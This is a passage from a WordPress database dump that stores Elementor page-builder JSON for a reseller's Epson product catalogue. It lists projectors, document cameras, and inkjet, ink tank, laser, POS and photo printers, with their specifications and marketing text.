]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/h4><br>\\n<img class=\\\"wp-image-2443 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><br>\\n\\nDiscover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.\\n<ul>\\n \\t<li>White and Colour Brightness at 10,000\\u00a0lm<\\/li>\\n \\t<li>WUXGA resolution<\\/li>\\n \\t<li>High Reliability and Durability<\\/li>\\n \\t<li>Suitable for 24\\/7 usage<\\/li>\\n \\t<li>Flexible projection angles and installations<\\/li>\\n<\\/ul>\\n<div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8082,3498,'_elementor_version','2.5.14'),(8658,3663,'_elementor_edit_mode','builder'),(8659,3663,'_elementor_template_type','wp-page'),(8085,3499,'_wp_page_template','template-fullwidth.php'),(8086,3499,'_elementor_edit_mode','builder'),(8087,3499,'_elementor_template_type','post'),(8088,3499,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 